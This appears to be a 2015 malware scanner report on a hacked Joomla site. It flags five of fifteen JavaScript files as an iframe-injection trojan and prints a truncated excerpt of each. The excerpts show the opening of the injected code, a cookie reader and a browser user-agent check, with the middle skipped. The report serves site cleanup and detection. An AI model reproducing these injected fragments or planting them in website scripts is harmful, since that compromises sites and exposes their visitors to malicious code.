
Malware Scanner report for kozulka-grad.ru

Malicious/Suspicious/Total urls checked
5/0/15
5 of the 15 checked URLs contain malicious code. See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "kozulka-grad.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kozulka-grad.ru

Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://kozulka-grad.ru/
200 OK
Content-Length: 80435
Content-Type: text/html
clean
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-1.7.2.min.js
200 OK
Content-Length: 94840
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js
200 OK
Content-Length: 20
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jqueryui/js/jquery-ui-1.8.20.custom.min.js
200 OK
Content-Length: 206731
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 97340
Content-Type: application/x-javascript
malicious
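Malicious code - confirmed by antiviruses (see below). The excerpt shows the start and the end of the file with the middle skipped. The same opening block (getCookie followed by an anonymous function that tests navigator.userAgent) starts every file marked malicious in this report, so it appears to be the injected part; the end of each excerpt appears to be the file's original code.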

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3112 bytes are skipped ...
cument.id(element,true);element.parentNode.replaceChild(this.toElement(),element);return this;},inject:function(element){document.id(element,true).appendChild(this.toElement());
return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>");
return eval(rs);};})();

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/media/system/js/core.js
200 OK
Content-Length: 5762
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3171 bytes are skipped ...
nprops);4<=parseInt(navigator.appVersion)&&win.window.focus()}
/**
 * NOTE(review): this comment is not part of the scanned file; the code line below is unchanged.
 *
 * Three form helpers from the end of the file, all operating on document.adminForm:
 *
 * tableOrdering(a, b, c) - writes a into the filter_order field and b into the
 *   filter_order_Dir field, then calls submitform(c).
 * saveorder(a, b) - forwards both arguments to checkAll_button.
 * checkAll_button(a, b) - b falls back to "saveorder" when falsy. Walks the form
 *   fields cb0 .. cb<a> (inclusive); a field that is present and unchecked gets
 *   checked, a missing field triggers the alert and returns without submitting.
 *   If the loop completes, calls submitform(b).
 *
 * submitform is defined outside this excerpt. Nothing on this line reads cookies,
 * inspects the user agent or creates elements; it looks like stock CMS code rather
 * than part of the injection - confirm by comparing with a known-good copy of the
 * installed version.
 */
function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)};

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/media/system/js/caption.js
200 OK
Content-Length: 1707
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 529 bytes are skipped ...
e(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!=
""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 239309
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=1111
200 OK
Content-Length: 57516
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/templates/vt_sport/vtemtools/menus/vtem_menu.js
200 OK
Content-Length: 10563
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/components/com_kide/js/base.js
200 OK
Content-Length: 20951
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3513 bytes are skipped ...
d();
alert(out);
}
}
};
ajax.open('POST', kide.ajax_url+"&task=catpcha_check", true);
ajax.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
ajax.send('recaptcha_challenge_field='+encodeURIComponent(kide.form('recaptcha_challenge_field'))+'&recaptcha_response_field='+encodeURIComponent(kide.form('recaptcha_response_field')));
}
};
kide.events.add('onAjax_captcha_check', kide.captcha.onAjax_check);

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/components/com_kide/templates/default/js/kide.js
200 OK
Content-Length: 7280
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/modules/mod_slogin/media/slogin.js
200 OK
Content-Length: 4776
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/modules/mod_dinamods/js/dinamods.js
200 OK
Content-Length: 6021
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3403 bytes are skipped ...
abpersistence && this.getselectedClassTarget(this.tabs[i]).className=="dm_selected"){
this.expandtab(this.tabs[i]);
persisterror=false;
}
}
}
if (persisterror)
this.expandtab(this.tabs[this.hottabspositions[0]]);
if (parseInt(this.automodeperiod)>500 && this.hottabspositions.length>1){
this.autoruntimer=setInterval(function(){tabinstance.autorun()}, this.automodeperiod);
}

}
}

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/modules/mod_joomleague_matches/assets/js/mod_joomleague_matches.js
200 OK
Content-Length: 5841
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kozulka-grad.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 Jan 2015 06:24:20 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ee98d926ecc6b0e698d1e3ca2331fd3f=5d23f64b3f32c65d62397ab1c1c0cf1c; path=/
Set-Cookie: kide_config=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: kozulka-grad.ru
Referer: http://www.google.com/search?q=kozulka-grad.ru

Result:
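The result is similar to the first query. No suspicious redirects were found. Both queries compare HTTP responses only, so this check does not cover what the flagged JavaScript files do once they run in a visitor's browser.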